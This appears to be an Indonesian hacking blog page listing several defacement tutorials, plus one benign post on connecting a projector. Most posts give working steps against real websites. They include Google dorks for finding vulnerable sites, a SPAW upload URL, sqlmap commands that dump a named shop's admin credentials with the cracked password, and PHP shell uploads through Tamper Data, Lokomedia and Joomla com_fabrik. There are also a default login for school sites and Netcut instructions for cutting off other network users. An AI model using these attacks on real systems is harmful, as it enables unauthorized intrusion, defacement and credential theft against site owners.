PPC Iklan Blogger Indonesia

Rabu, 01 Mei 2013

0 Deface Website With Spaw Uploads Vulnerability.

02.10 Under From Unknown
[0 Comment]
Hallo Sobat ICA, kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yasudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke target aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability 
1). Pertama, Masukan Dorknya :
inurl:”spaw2/uploads/files/”
Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangan site:co.id yah 

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :                     http://contoh.com/spaw2/uploads/files/
3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
4). Tekan Enter, Nanti akan Terbuka Seperti Ini :
5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.
6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.
7). Selanjutnya Klik Tombol Upload.
8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.
9). Selesai
Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.
Read More »

0 Deface Dengan SQLMAP di Backtrack 5

01.52 Under From Unknown
[0 Comment]
Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]



[+] LANGKAHNYA MAS BRO [+]
(*Untuk Windows kalian cari dulu ke sini )
1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)
2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah
  • /pentest/web/scanners/sqlmap /
3. Ketikan printah ini :

  • python ./sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs
setelah itu klik enter, maka akan muncul Database Target (*See Image)
4. Setelah dapet nama Data Basenya kita ketikan printah :
  • python ./sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :
5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

  • python ./sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini : 
6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

  • python ./sqlmap.py -u http://www.target.com -D nama_database -T table --dump
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"
  • do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624
Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

Nah setelah saya Decrypt ane dapetin nih :
Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D


HASIL : 
masih kena deface tuh : http://www.vana-shop.com/
dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)
Read More »

0 Potong jaringan Internet Dengan Netcut

01.45 Under From Unknown
[0 Comment]





Netcut adalah program yang dapat digunakan untuk memantaince sebuah jaringan. Ini berguna bagi administrator untuk mencegah aktifitas illegal dari user dengan cara meng cut off koneksi user.

Pada kenyataannya, program ini justru lebih sering digunakan oleh user dalam sebuah jaringan (LAN) atau hotspot (WLAN) untuk menguasai bandwidth dalam sebuah LAN atau Wireless LAN / Hotspot (WLAN).

Program ini sangat berguna buat temen - temen yang menggunakan sharing koneksi di kantor, warnet, ataupun cafe / tempat ber hotspot. Netcut bukanlah barang baru, jadi mungkin sebagian teman - teman sudah memiliki atau menggunakan program ini. Tapi karena pertanyaan dan permintaan teman - teman untuk membuat tutorial ini, maka jadilah tutor singkat ini.

Berikut Instruksinya:

1. Install dulu netcut nya
2. Ekstrak patch nya ke direktori netcut aslinya
3. Restart
4. Jalankan Netcut
5. Pilih Netcard aktif yang ingin anda scan
6. Sekarang tinggal klik pada ip yang ingin dimatikan koneksinya.

Klik Cut Off untuk mematikan sambungan. Klik resume untuk mengembalikan sambungan yang telah di cut.

Sisakan beberapa komputer, jadi kan gak ketauan amat kamu yang ngerjain. Masak yang laen mati kamu masih online. Hahah


download here
Read More »

0 Cara setting Proyektor Ke Laptop atau Komputer

01.40 Under From Unknown
[0 Comment]
Lagi Suntuk Mau ngapain , Eh ada ide ngeposting mensetting Proyektor :D Oke Langsung aja yah ..
memang biasanya ada komputer yang tidak usah menggunakan cara cara setting seperti ini, jadi waktu kabel proyektor di hubungkan ke laptop langsung otomatis ke detek dan langsung bisa digunakan, tapi ada pula yang harus terlebih dahulu di setting secara manual agar bisa terhubung. dan berikut ini cara setting manualnya :
  1. Untuk Laptop Kompaq: 
  • Tekan fn+F4 (tunggu beberapa detik karena LCD proyektor akan mencari perangkat).
  • Tekan fn+F4 (F4 ditekan 1x)  biasanya tampilan hanya di LCD Proyektor sedangkan di Lapotop akan Blank.
  • Tekan fn+F4 (F4 di tekan 2x) maka akan muncul di Laptop dan LCD Proyektor. 
Cara Kedua :
Setting Di Desktop :
  1. Masuk ke layar awal laptop anda (desktop)
  2. Klik kanan pada desktop
  3. Pilih Graphics Option>Output To>Intel(R) Dual Display Clone>Notebook + Monitor
  4. Tunggu beberapa detik untuk LCD akan mencari perangkat dan akan muncul di Laptop dan LCD Proyektor.
  5. Contoh seperti pada gambar dibawah ini :
  1. Untuk laptop acer : gunakan tombol (fn+F5), setelah lakukan itu otomatis laptop langsung terhubung dengan proyektor atau LCD
  2. Setting Screen Resolution :
          Seperti gambar dibawah ini :
  1. Setting Koneksi Laptop Ke LCD :
Dan demikianlah pengetahuan saya yang dapat saya bagikan kepada anda. semoga bermanfaat.
Read More »

2 Shell Upload With Tamper Data

01.39 Under From Unknown
[2 Comment]
Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah kalo ntar pas agan mau upload extensi .jpg bagaimana ? yah, harus memakai Teknik Tamper Data ... Yaitu memanfaatkan celah upload image, sedangkan kita menipu admin dengan mengupload file yg extensi nya .php ^_^

Dork : inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"

NB : Anda bias menambahkan site: ^_^



1. Siapakan dulu file shell.php seperti : Shell B374K M1N1


2.  Pilih salah satu shell
3. Rename  extensinya menjadi : shell.php.jpg
4. Install add ons Tamper Data dulu di browser mozilla kita :D
 
5. Restart dan kita mulai upload 
6. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan

8. Trus Uploads shell.php.jpg kita dan tamper :D


 9. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan hapus bagian .jpg , akan menjadi shell.php .. abis gitu kita klik OK



Letak Shellnya :

http://site.com/wp-content/themes/ ? /images/tmp/[shellmu] -
http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
Read More »

1 Bug CMS Lokomedia After Patch

01.37 Under From Unknown
[1 Comment]
Bugs Template CMS Lokomedia After Patch

Arsyad-Cyber - Permasalahan yang dihadapi sekarang adalah jika admin sebuah website yang kita deface mengetahui celah websitenya dan melakukan sebuah tindakan yang dinamakan Patch. Jika hal tersebut terjadi hal seperti Deface Lokomedia sudah tidak berfungsi lagi, tapi jangan khawatir karena saya mempunyai bugs lain dalam deface Lokomedia.

Dork : allinurl:media.php?module=berita
Pilih suatu web yang menurut anda bisa di deface dengan lokomedia , ingat !!! tutorial selanjutnya itu sama dengan artikel Deface Dengan Lokomedia tetapi masalahnya ketika anda pasang banner tempat upload nya tidak ada karena sudah di patch.

http://www.target.com/admin/content.php?module=banner
Langsung ganti url web target nya menjadi sperti berikut :

http://www.target.com/admin/modul/mod_banner.php
Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :

./aksi.php?module=banner&act=input
Kemudian ganti dengan

http://www.target.com/admin/aksi.php?module=banner&act=input
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :

http://www.target.com/admin/foto_berita/shell.php
Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami hanya share ilmu yang kami tahu dan tidak untuk membahayakan dan merugikan pihak lain bahkan resiko anda sendiri yang menanggungnya. Dan Untuk admin website Lokomedia saya harapkan untuk menutup bugs tersebut agar website anda aman dari serangan defacer yang banyak di dunia maya ini. Semoga Bermanfaat untuk anda semua.

Happy To Hacker And Defacer , Its All About Your'e Brian !!!
Read More »

0 Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability

01.21 Under From Unknown
[0 Comment]
Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.
Oke, langsung saja.
Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik

Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1




Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV

Dan shell kita akan terletak di [site]/media/[shell.php]


Terus,  hajar !!!!
We Are Surabaya BlackHat !
Sekian tutorial kali ini, semoga bermanfaat.
Read More »

0 Teknik Default Password

01.14 Under From Unknown
[0 Comment]
Dork : inurl:/html/index.php +site:sch.id

Exploit : /member/index.php or /member/user.php

User : siswanto
Pass : 123456

Tahap Menanam Shell

SIM -> Data Laporan -> Tambah data laporan -> simpan -> sukses

                                             Tempat shell berada :

                                              site.sch.id/laporan/namashell.php

                                           - Tintonz-x207 - 207 Cyber Security - Java Defacer Team
Read More »